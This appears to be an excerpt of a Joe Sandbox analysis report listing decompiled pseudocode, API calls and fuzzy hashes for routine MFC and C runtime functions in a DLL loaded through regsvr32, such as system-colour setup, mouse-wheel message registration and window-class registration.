LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441,00000000), ref: 10013D74

Memory Dump Source

Source File: 00000003.00000002.247739741.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.247733678.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247773643.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247782219.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.247841184.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247850932.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247858800.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: CriticalLeaveSection$Exception@8Throw$AllocExceptionLocalRaiseValue_memset
String ID:
API String ID: 356813703-0
Opcode ID: 7dcaef9dd6dc2c20a9afc37e1070812523d3c5c417591cb16522903d097c7fc3
Instruction ID: da2c65ce7076d342f4508b5b0ea9d94b5e5006c79099ef9a6e76071fa7915ca4
Opcode Fuzzy Hash: 7dcaef9dd6dc2c20a9afc37e1070812523d3c5c417591cb16522903d097c7fc3
Instruction Fuzzy Hash: BD118E7450060AAFE710EF65DC8AC1BBBB9FF04354720C128F4599A566CB30ECA0CB50

Uniqueness

Uniqueness Score: -1.00%

Function 10013810, Relevance: 10.5, APIs: 7, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10013810(void* __ecx) {
				struct HBRUSH__* _t14;
				void* _t18;

				_t18 = __ecx;
				 *((intOrPtr*)(_t18 + 0x28)) = GetSysColor(0xf);
				 *((intOrPtr*)(_t18 + 0x2c)) = GetSysColor(0x10);
				 *((intOrPtr*)(_t18 + 0x30)) = GetSysColor(0x14);
				 *((intOrPtr*)(_t18 + 0x34)) = GetSysColor(0x12);
				 *((intOrPtr*)(_t18 + 0x38)) = GetSysColor(6);
				 *((intOrPtr*)(_t18 + 0x24)) = GetSysColorBrush(0xf);
				_t14 = GetSysColorBrush(6);
				 *(_t18 + 0x20) = _t14;
				return _t14;
			}

0x1001381a
0x10013820
0x10013827
0x1001382e
0x10013835
0x10013842
0x10013849
0x1001384c
0x1001384f
0x10013853

APIs

GetSysColor.USER32(0000000F), ref: 1001381C
GetSysColor.USER32(00000010), ref: 10013823
GetSysColor.USER32(00000014), ref: 1001382A
GetSysColor.USER32(00000012), ref: 10013831
GetSysColor.USER32(00000006), ref: 10013838
GetSysColorBrush.USER32(0000000F), ref: 10013845
GetSysColorBrush.USER32(00000006), ref: 1001384C

Memory Dump Source

Source File: 00000003.00000002.247739741.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.247733678.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247773643.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247782219.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.247841184.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247850932.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247858800.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Color$Brush
String ID:
API String ID: 2798902688-0
Opcode ID: ec9fc2993fab2a5d820fe3d8a281f31af429397108a6c3a84ca499368f54399a
Instruction ID: 74b272bfbd302397870cb0a2abf86f81c97ca9371361d4e5ce15514e9afb48cd
Opcode Fuzzy Hash: ec9fc2993fab2a5d820fe3d8a281f31af429397108a6c3a84ca499368f54399a
Instruction Fuzzy Hash: E8F01C71940748ABE730BF728D49B47BAE5FFC4B10F12092ED2858BA90E6B6E041DF40

Uniqueness

Uniqueness Score: -1.00%

Function 10028DE5, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 24
registrywindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10028DE5() {
				long _t5;
				int _t6;

				if((0x80000000 & GetVersion()) == 0 || GetVersion() != 4) {
					_t5 = GetVersion();
					if((0x80000000 & _t5) != 0) {
						L5:
						 *0x1005acc4 =  *0x1005acc4 & 0x00000000;
						return _t5;
					}
					_t5 = GetVersion();
					if(_t5 != 3) {
						goto L5;
					}
					goto L4;
				} else {
					L4:
					_t6 = RegisterWindowMessageA("MSWHEEL_ROLLMSG");
					 *0x1005acc4 = _t6;
					return _t6;
				}
			}

0x10028df6
0x10028e00
0x10028e04
0x10028e20
0x10028e20
0x00000000
0x10028e20
0x10028e06
0x10028e0c
0x00000000
0x00000000
0x00000000
0x10028e0e
0x10028e0e
0x10028e13
0x10028e19
0x00000000
0x10028e19

APIs

GetVersion.KERNEL32 ref: 10028DED
GetVersion.KERNEL32 ref: 10028DF8
GetVersion.KERNEL32 ref: 10028E00
GetVersion.KERNEL32 ref: 10028E06
RegisterWindowMessageA.USER32(MSWHEEL_ROLLMSG), ref: 10028E13

Strings

MSWHEEL_ROLLMSG, xrefs: 10028E0E

Memory Dump Source

Source File: 00000003.00000002.247739741.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.247733678.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247773643.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247782219.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.247841184.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247850932.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247858800.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Version$MessageRegisterWindow
String ID: MSWHEEL_ROLLMSG
API String ID: 303823969-2485103130
Opcode ID: 85f3e66c9038b440300e9b11d08aab107bdf81c33b47830274e071894da04cd4
Instruction ID: a1cfe5ae80d7d924f96357e0403be069d270e7200ca7c890729efff85db7b39d
Opcode Fuzzy Hash: 85f3e66c9038b440300e9b11d08aab107bdf81c33b47830274e071894da04cd4
Instruction Fuzzy Hash: 34E0D83E80213792F700A374AD0034939D5DB442E0F930066ED0042258CB24098747A5

Uniqueness

Uniqueness Score: -1.00%

Function 1000C209, Relevance: 9.1, APIs: 6, Instructions: 115
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E1000C209(void* __ecx, void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t37;
				signed int _t54;
				intOrPtr _t57;
				long _t60;
				struct HWND__* _t63;
				CHAR* _t64;
				void* _t65;
				void* _t67;
				void* _t71;
				void* _t72;
				long _t73;
				void* _t74;
				void* _t75;
				signed int _t77;
				void* _t78;
				signed int _t79;
				void* _t81;

				_t71 = __edx;
				_t79 = _t81 - 0x9c;
				_t37 =  *0x10057a08; // 0x3643b451
				 *(_t79 + 0x98) = _t37 ^ _t79;
				_t73 =  *(_t79 + 0xa4);
				_t77 = 0;
				 *((intOrPtr*)(_t79 - 0x80)) =  *((intOrPtr*)(_t79 + 0xa8));
				E1000C12A(0);
				_t67 = _t72;
				_t63 = E1000C15E(0, _t79 - 0x70);
				 *(_t79 - 0x7c) = _t63;
				if(_t63 !=  *(_t79 - 0x70)) {
					EnableWindow(_t63, 1);
				}
				 *(_t79 - 0x78) =  *(_t79 - 0x78) & _t77;
				GetWindowThreadProcessId(_t63, _t79 - 0x78);
				if(_t63 == 0 ||  *(_t79 - 0x78) != GetCurrentProcessId()) {
					L6:
					__eflags = _t73;
					if(__eflags != 0) {
						_t77 = _t73 + 0x78;
					}
					goto L8;
				} else {
					_t60 = SendMessageA(_t63, 0x376, 0, 0);
					if(_t60 == 0) {
						goto L6;
					} else {
						_t77 = _t60;
						L8:
						 *(_t79 - 0x74) =  *(_t79 - 0x74) & 0x00000000;
						if(_t77 != 0) {
							 *(_t79 - 0x74) =  *_t77;
							_t57 =  *((intOrPtr*)(_t79 + 0xb0));
							if(_t57 != 0) {
								 *_t77 = _t57 + 0x30000;
							}
						}
						if(( *(_t79 + 0xac) & 0x000000f0) == 0) {
							_t54 =  *(_t79 + 0xac) & 0x0000000f;
							if(_t54 <= 1) {
								_t24 = _t79 + 0xac;
								 *_t24 =  *(_t79 + 0xac) | 0x00000030;
								__eflags =  *_t24;
							} else {
								if(_t54 + 0xfffffffd <= 1) {
									 *(_t79 + 0xac) =  *(_t79 + 0xac) | 0x00000020;
								}
							}
						}
						_t96 = _t73;
						 *(_t79 - 0x6c) = 0;
						if(_t73 == 0) {
							_t64 = _t79 - 0x6c;
							_t73 = 0x104;
							__eflags = GetModuleFileNameA(0, _t64, 0x104) - 0x104;
							if(__eflags == 0) {
								 *((char*)(_t79 + 0x97)) = 0;
							}
						} else {
							_t64 =  *(_t73 + 0x50);
						}
						_push( *(_t79 + 0xac));
						_push(_t64);
						_push( *((intOrPtr*)(_t79 - 0x80)));
						_push( *(_t79 - 0x7c));
						_t74 = E1000C093(_t64, _t67, _t73, _t77, _t96);
						if(_t77 != 0) {
							 *_t77 =  *(_t79 - 0x74);
						}
						if( *(_t79 - 0x70) != 0) {
							EnableWindow( *(_t79 - 0x70), 1);
						}
						E1000C12A(1);
						_pop(_t75);
						_pop(_t78);
						_pop(_t65);
						return E100167D5(_t74, _t65,  *(_t79 + 0x98) ^ _t79, _t71, _t75, _t78);
					}
				}
			}

0x1000c209
0x1000c20a
0x1000c217
0x1000c21e
0x1000c22d
0x1000c233
0x1000c236
0x1000c239
0x1000c23e
0x1000c249
0x1000c24e
0x1000c251
0x1000c256
0x1000c256
0x1000c25c
0x1000c264
0x1000c26c
0x1000c291
0x1000c291
0x1000c293
0x1000c295
0x1000c295
0x00000000
0x1000c279
0x1000c283
0x1000c28b
0x00000000
0x1000c28d
0x1000c28d
0x1000c298
0x1000c298
0x1000c29e
0x1000c2a2
0x1000c2a5
0x1000c2ad
0x1000c2b4
0x1000c2b4
0x1000c2ad
0x1000c2bd
0x1000c2c5
0x1000c2cb
0x1000c2de
0x1000c2de
0x1000c2de
0x1000c2cd
0x1000c2d3
0x1000c2d5
0x1000c2d5
0x1000c2d3
0x1000c2cb
0x1000c2e5
0x1000c2e7
0x1000c2eb
0x1000c2f2
0x1000c2f5
0x1000c306
0x1000c308
0x1000c30a
0x1000c30a
0x1000c2ed
0x1000c2ed
0x1000c2ed
0x1000c311
0x1000c317
0x1000c318
0x1000c31b
0x1000c328
0x1000c32a
0x1000c32f
0x1000c32f
0x1000c335
0x1000c33c
0x1000c33c
0x1000c344
0x1000c352
0x1000c353
0x1000c356
0x1000c363
0x1000c363
0x1000c28b

APIs

Part of subcall function 1000C15E: GetParent.USER32(100014EC), ref: 1000C1B1
Part of subcall function 1000C15E: GetLastActivePopup.USER32(100014EC), ref: 1000C1C0
Part of subcall function 1000C15E: IsWindowEnabled.USER32(100014EC), ref: 1000C1D5
Part of subcall function 1000C15E: EnableWindow.USER32(100014EC,00000000), ref: 1000C1E8

EnableWindow.USER32(?,00000001), ref: 1000C256
GetWindowThreadProcessId.USER32(?,?), ref: 1000C264
GetCurrentProcessId.KERNEL32 ref: 1000C26E
SendMessageA.USER32 ref: 1000C283
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1000C300
EnableWindow.USER32(?,00000001), ref: 1000C33C

Memory Dump Source

Source File: 00000003.00000002.247739741.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.247733678.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247773643.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247782219.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.247841184.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247850932.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247858800.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$Enable$Process$ActiveCurrentEnabledFileLastMessageModuleNameParentPopupSendThread
String ID:
API String ID: 1877664794-0
Opcode ID: d475a19da1505cd8c491af7de1dd181a650697f179afdcdb5f27c752af681c02
Instruction ID: 906afa4fd5bad6b09c7d7bb12576003d117f5a582180c2333a3862cf80afbe79
Opcode Fuzzy Hash: d475a19da1505cd8c491af7de1dd181a650697f179afdcdb5f27c752af681c02
Instruction Fuzzy Hash: A1416A32A0035C9FFB31CFA58C85FDD7BA8EF05390F210129E949AB286D7709A408B50

Uniqueness

Uniqueness Score: -1.00%

Function 1000C15E, Relevance: 9.1, APIs: 6, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000C15E(struct HWND__* _a4, struct HWND__** _a8) {
				struct HWND__* _t7;
				void* _t13;
				struct HWND__** _t15;
				struct HWND__* _t16;
				struct HWND__* _t17;
				struct HWND__* _t18;

				_t18 = _a4;
				_t17 = _t18;
				if(_t18 != 0) {
					L5:
					if((GetWindowLongA(_t17, 0xfffffff0) & 0x40000000) == 0) {
						L8:
						_t16 = _t17;
						_t7 = _t17;
						if(_t17 == 0) {
							L10:
							if(_t18 == 0 && _t17 != 0) {
								_t17 = GetLastActivePopup(_t17);
							}
							_t15 = _a8;
							if(_t15 != 0) {
								if(_t16 == 0 || IsWindowEnabled(_t16) == 0 || _t16 == _t17) {
									 *_t15 =  *_t15 & 0x00000000;
								} else {
									 *_t15 = _t16;
									EnableWindow(_t16, 0);
								}
							}
							return _t17;
						} else {
							goto L9;
						}
						do {
							L9:
							_t16 = _t7;
							_t7 = GetParent(_t7);
						} while (_t7 != 0);
						goto L10;
					}
					_t17 = GetParent(_t17);
					L7:
					if(_t17 != 0) {
						goto L5;
					}
					goto L8;
				}
				_t13 = E1000C087();
				if(_t13 != 0) {
					L4:
					_t17 =  *(_t13 + 0x20);
					goto L7;
				}
				_t13 = E1000A7CE();
				if(_t13 != 0) {
					goto L4;
				}
				_t17 = 0;
				goto L8;
			}

0x1000c166
0x1000c16e
0x1000c170
0x1000c18d
0x1000c19b
0x1000c1a6
0x1000c1a8
0x1000c1aa
0x1000c1ac
0x1000c1b7
0x1000c1b9
0x1000c1c6
0x1000c1c6
0x1000c1c8
0x1000c1ce
0x1000c1d2
0x1000c1f0
0x1000c1e3
0x1000c1e6
0x1000c1e8
0x1000c1e8
0x1000c1d2
0x1000c1f9
0x00000000
0x00000000
0x00000000
0x1000c1ae
0x1000c1ae
0x1000c1af
0x1000c1b1
0x1000c1b3
0x00000000
0x1000c1ae
0x1000c1a0
0x1000c1a2
0x1000c1a4
0x00000000
0x00000000
0x00000000
0x1000c1a4
0x1000c172
0x1000c179
0x1000c188
0x1000c188
0x00000000
0x1000c188
0x1000c17b
0x1000c182
0x00000000
0x00000000
0x1000c184
0x00000000

APIs

GetWindowLongA.USER32 ref: 1000C190
GetParent.USER32(100014EC), ref: 1000C19E
GetParent.USER32(100014EC), ref: 1000C1B1
GetLastActivePopup.USER32(100014EC), ref: 1000C1C0
IsWindowEnabled.USER32(100014EC), ref: 1000C1D5
EnableWindow.USER32(100014EC,00000000), ref: 1000C1E8

Memory Dump Source

Source File: 00000003.00000002.247739741.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.247733678.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247773643.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247782219.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.247841184.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247850932.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247858800.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
String ID:
API String ID: 670545878-0
Opcode ID: 716a915a51b72e7755bd765e65025d5e7cdfb43fa73cbfe2d9e3b7854765710c
Instruction ID: b03ffd99d979528eb1576ebd7f6c5d6629826c0934e428a14188cd3025a76a69
Opcode Fuzzy Hash: 716a915a51b72e7755bd765e65025d5e7cdfb43fa73cbfe2d9e3b7854765710c
Instruction Fuzzy Hash: CC11A33264533A57F221DB698C80F9A72ECDF4BAD0F260129FC44E329ADB60DC0242D5

Uniqueness

Uniqueness Score: -1.00%

Function 1001411A, Relevance: 9.0, APIs: 6, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 38%

			E1001411A(struct HWND__* _a4, struct tagPOINT _a8, intOrPtr _a12) {
				struct tagRECT _v20;
				struct HWND__* _t12;
				struct HWND__* _t21;

				ClientToScreen(_a4,  &_a8);
				_push(5);
				_push(_a4);
				while(1) {
					_t12 = GetWindow();
					_t21 = _t12;
					if(_t21 == 0) {
						break;
					}
					if(GetDlgCtrlID(_t21) != 0 && (GetWindowLongA(_t21, 0xfffffff0) & 0x10000000) != 0) {
						GetWindowRect(_t21,  &_v20);
						_push(_a12);
						if(PtInRect( &_v20, _a8) != 0) {
							return _t21;
						}
					}
					_push(2);
					_push(_t21);
				}
				return _t12;
			}

0x10014129
0x10014135
0x10014137
0x1001417a
0x1001417a
0x1001417c
0x10014180
0x00000000
0x00000000
0x10014146
0x1001415d
0x10014163
0x10014175
0x00000000
0x10014188
0x10014175
0x10014177
0x10014179
0x10014179
0x10014185

APIs

ClientToScreen.USER32(?,?), ref: 10014129
GetDlgCtrlID.USER32 ref: 1001413D
GetWindowLongA.USER32 ref: 1001414B
GetWindowRect.USER32 ref: 1001415D
PtInRect.USER32(?,?,?), ref: 1001416D
GetWindow.USER32(?,00000005), ref: 1001417A

Memory Dump Source

Source File: 00000003.00000002.247739741.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.247733678.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247773643.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247782219.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.247841184.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247850932.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247858800.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$Rect$ClientCtrlLongScreen
String ID:
API String ID: 1315500227-0
Opcode ID: fd09e00dcf5aea0f889a5d5334f0ce8489c3ad9d17b5f7afd937dd6b6d05cc64
Instruction ID: 106842abd73dbf2249684b53af78e8d9c6ae05809ec90903e9ae8d6f26667822
Opcode Fuzzy Hash: fd09e00dcf5aea0f889a5d5334f0ce8489c3ad9d17b5f7afd937dd6b6d05cc64
Instruction Fuzzy Hash: AA014F36500126BBDB12DF658C48EDE77ACEF15791F124114F911AA1A0DB30DA82CA94

Uniqueness

Uniqueness Score: -1.00%

Function 10012406, Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 234
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E10012406(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, signed int _a4) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				char* _v20;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v40;
				intOrPtr _v52;
				signed int _v56;
				void* __ebp;
				intOrPtr _t122;
				void* _t128;
				intOrPtr _t130;
				signed int _t139;
				signed int _t144;
				signed int _t175;
				signed int _t177;
				signed int _t179;
				signed int _t181;
				signed int _t183;
				signed int _t187;
				void* _t190;
				intOrPtr _t191;
				signed int _t201;

				_t190 = __ecx;
				_t122 = E1000D5EC(__ebx, __edi, __esi, __eflags);
				_v8 = _t122;
				_t3 =  &_a4;
				 *_t3 = _a4 &  !( *(_t122 + 0x18));
				if( *_t3 == 0) {
					return 1;
				}
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t201 = 0;
				E100174D0(0,  &_v56, 0, 0x28);
				_v52 = DefWindowProcA;
				_t128 = E1000D5EC(__ebx, 0, 0, __eflags);
				__eflags = _a4 & 0x00000001;
				_v40 =  *((intOrPtr*)(_t128 + 8));
				_t130 =  *0x1005aa70; // 0x10003
				_t187 = 8;
				_v32 = _t130;
				_v16 = _t187;
				if(__eflags != 0) {
					_push( &_v56);
					_v56 = 0xb;
					_v20 = "AfxWnd80s";
					_t183 = E10012222(_t187, _t190, 0, 0, __eflags);
					__eflags = _t183;
					if(_t183 != 0) {
						_t201 = 1;
						__eflags = 1;
					}
				}
				__eflags = _a4 & 0x00000020;
				if(__eflags != 0) {
					_v56 = _v56 | 0x0000008b;
					_push( &_v56);
					_v20 = "AfxOleControl80s";
					_t181 = E10012222(_t187, _t190, 0, _t201, __eflags);
					__eflags = _t181;
					if(_t181 != 0) {
						_t201 = _t201 | 0x00000020;
						__eflags = _t201;
					}
				}
				__eflags = _a4 & 0x00000002;
				if(__eflags != 0) {
					_push( &_v56);
					_v56 = 0;
					_v20 = "AfxControlBar80s";
					_v28 = 0x10;
					_t179 = E10012222(_t187, _t190, 0, _t201, __eflags);
					__eflags = _t179;
					if(_t179 != 0) {
						_t201 = _t201 | 0x00000002;
						__eflags = _t201;
					}
				}
				__eflags = _a4 & 0x00000004;
				if(__eflags != 0) {
					_v56 = _t187;
					_v28 = 0;
					_t177 = E100123C5(_t190, __eflags,  &_v56, "AfxMDIFrame80s", 0x7a01);
					__eflags = _t177;
					if(_t177 != 0) {
						_t201 = _t201 | 0x00000004;
						__eflags = _t201;
					}
				}
				__eflags = _a4 & _t187;
				if(__eflags != 0) {
					_v56 = 0xb;
					_v28 = 6;
					_t175 = E100123C5(_t190, __eflags,  &_v56, "AfxFrameOrView80s", 0x7a02);
					__eflags = _t175;
					if(_t175 != 0) {
						_t201 = _t201 | _t187;
						__eflags = _t201;
					}
				}
				__eflags = _a4 & 0x00000010;
				if(__eflags != 0) {
					_v12 = 0xff;
					_t201 = _t201 | E10010087(_t187, _t190, _t201, __eflags,  &_v16, 0x3fc0);
					_t48 =  &_a4;
					 *_t48 = _a4 & 0xffffc03f;
					__eflags =  *_t48;
				}
				__eflags = _a4 & 0x00000040;
				if(__eflags != 0) {
					_v12 = 0x10;
					_t201 = _t201 | E10010087(_t187, _t190, _t201, __eflags,  &_v16, 0x40);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000080;
				if(__eflags != 0) {
					_v12 = 2;
					_t201 = _t201 | E10010087(_t187, _t190, _t201, __eflags,  &_v16, 0x80);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000100;
				if(__eflags != 0) {
					_v12 = _t187;
					_t201 = _t201 | E10010087(_t187, _t190, _t201, __eflags,  &_v16, 0x100);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000200;
				if(__eflags != 0) {
					_v12 = 0x20;
					_t201 = _t201 | E10010087(_t187, _t190, _t201, __eflags,  &_v16, 0x200);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000400;
				if(__eflags != 0) {
					_v12 = 1;
					_t201 = _t201 | E10010087(0x400, _t190, _t201, __eflags,  &_v16, 0x400);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000800;
				if(__eflags != 0) {
					_v12 = 0x40;
					_t201 = _t201 | E10010087(0x400, _t190, _t201, __eflags,  &_v16, 0x800);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00001000;
				if(__eflags != 0) {
					_v12 = 4;
					_t201 = _t201 | E10010087(0x400, _t190, _t201, __eflags,  &_v16, 0x1000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00002000;
				if(__eflags != 0) {
					_v12 = 0x80;
					_t201 = _t201 | E10010087(0x400, _t190, _t201, __eflags,  &_v16, 0x2000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00004000;
				if(__eflags != 0) {
					_v12 = 0x800;
					_t201 = _t201 | E10010087(0x400, _t190, _t201, __eflags,  &_v16, 0x4000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00008000;
				if(__eflags != 0) {
					_v12 = 0x400;
					_t201 = _t201 | E10010087(0x400, _t190, _t201, __eflags,  &_v16, 0x8000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00010000;
				if(__eflags != 0) {
					_v12 = 0x200;
					_t201 = _t201 | E10010087(0x400, _t190, _t201, __eflags,  &_v16, 0x10000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00020000;
				if(__eflags != 0) {
					_v12 = 0x100;
					_t201 = _t201 | E10010087(0x400, _t190, _t201, __eflags,  &_v16, 0x20000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00040000;
				if(__eflags != 0) {
					_v12 = 0x8000;
					_t201 = _t201 | E10010087(0x400, _t190, _t201, __eflags,  &_v16, 0x40000);
					__eflags = _t201;
				}
				_t191 = _v8;
				 *(_t191 + 0x18) =  *(_t191 + 0x18) | _t201;
				_t139 =  *(_t191 + 0x18);
				__eflags = (_t139 & 0x00003fc0) - 0x3fc0;
				if((_t139 & 0x00003fc0) == 0x3fc0) {
					 *(_t191 + 0x18) = _t139 | 0x00000010;
					_t201 = _t201 | 0x00000010;
					__eflags = _t201;
				}
				asm("sbb eax, eax");
				_t144 =  ~((_t201 & _a4) - _a4) + 1;
				__eflags = _t144;
				return _t144;
			}

0x10012406
0x1001240c
0x10012411
0x10012419
0x10012419
0x1001241c
0x00000000
0x10012420
0x10012426
0x10012427
0x10012428
0x10012432
0x10012434
0x10012441
0x10012444
0x10012449
0x10012452
0x10012455
0x1001245a
0x1001245b
0x1001245e
0x10012461
0x10012466
0x10012467
0x1001246e
0x10012475
0x1001247a
0x1001247c
0x1001247e
0x1001247e
0x1001247e
0x1001247c
0x1001247f
0x10012483
0x10012485
0x1001248f
0x10012490
0x10012497
0x1001249c
0x1001249e
0x100124a0
0x100124a0
0x100124a0
0x1001249e
0x100124a3
0x100124a7
0x100124ac
0x100124ad
0x100124b0
0x100124b7
0x100124be
0x100124c3
0x100124c5
0x100124c7
0x100124c7
0x100124c7
0x100124c5
0x100124ca
0x100124ce
0x100124de
0x100124e1
0x100124e4
0x100124e9
0x100124eb
0x100124ed
0x100124ed
0x100124ed
0x100124eb
0x100124f0
0x100124f3
0x10012503
0x1001250a
0x10012511
0x10012516
0x10012518
0x1001251a
0x1001251a
0x1001251a
0x10012518
0x1001251c
0x10012520
0x1001252b
0x10012537
0x10012539
0x10012539
0x10012539
0x10012539
0x10012540
0x10012544
0x1001254c
0x10012558
0x10012558
0x10012558
0x1001255a
0x1001255e
0x10012569
0x10012575
0x10012575
0x10012575
0x1001257c
0x1001257f
0x10012586
0x1001258e
0x1001258e
0x1001258e
0x10012595
0x10012598
0x1001259f
0x100125ab
0x100125ab
0x100125ab
0x100125b2
0x100125b5
0x100125bc
0x100125c8
0x100125c8
0x100125c8
0x100125cf
0x100125d2
0x100125d9
0x100125e5
0x100125e5
0x100125e5
0x100125ec
0x100125ef
0x100125f6
0x10012602
0x10012602
0x10012602
0x10012609
0x1001260c
0x10012613
0x1001261f
0x1001261f
0x1001261f
0x10012626
0x10012629
0x10012630
0x10012638
0x10012638
0x10012638
0x1001263f
0x10012642
0x10012649
0x10012651
0x10012651
0x10012651
0x10012658
0x1001265b
0x10012662
0x1001266e
0x1001266e
0x1001266e
0x10012675
0x10012678
0x1001267f
0x1001268b
0x1001268b
0x1001268b
0x10012692
0x10012695
0x1001269c
0x100126a4
0x100126a4
0x100126a4
0x100126a6
0x100126a9
0x100126ac
0x100126b8
0x100126ba
0x100126bf
0x100126c2
0x100126c2
0x100126c2
0x100126d1
0x100126d3
0x100126d3
0x00000000

APIs

_memset.LIBCMT ref: 10012434

Strings

@, xrefs: 10012540
AfxFrameOrView80s, xrefs: 100124FA
@, xrefs: 100125D9
AfxMDIFrame80s, xrefs: 100124D5

Memory Dump Source

Source File: 00000003.00000002.247739741.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.247733678.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247773643.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247782219.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.247841184.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247850932.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247858800.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: _memset
String ID: @$@$AfxFrameOrView80s$AfxMDIFrame80s
API String ID: 2102423945-4122032997
Opcode ID: 6a965a47b8202c06a0f9d29b019c3ce5b36ca544f607173cb73e005fb23cc034
Instruction ID: 475a3f3acc0ffbf0912b6f4f501dab117ae518df3bc7e116c44220daacf7d2ae
Opcode Fuzzy Hash: 6a965a47b8202c06a0f9d29b019c3ce5b36ca544f607173cb73e005fb23cc034
Instruction Fuzzy Hash: 658130B5D00259AADB41CFA4C581BDEBBF8FF08384F118165F949EA181E774DAD4CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 100017E0, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 134windowCOMMON

Download Yara Rule

APIs

Part of subcall function 1000C4C7: _memset.LIBCMT ref: 1000C4DE

_strlen.LIBCMT ref: 100018FF
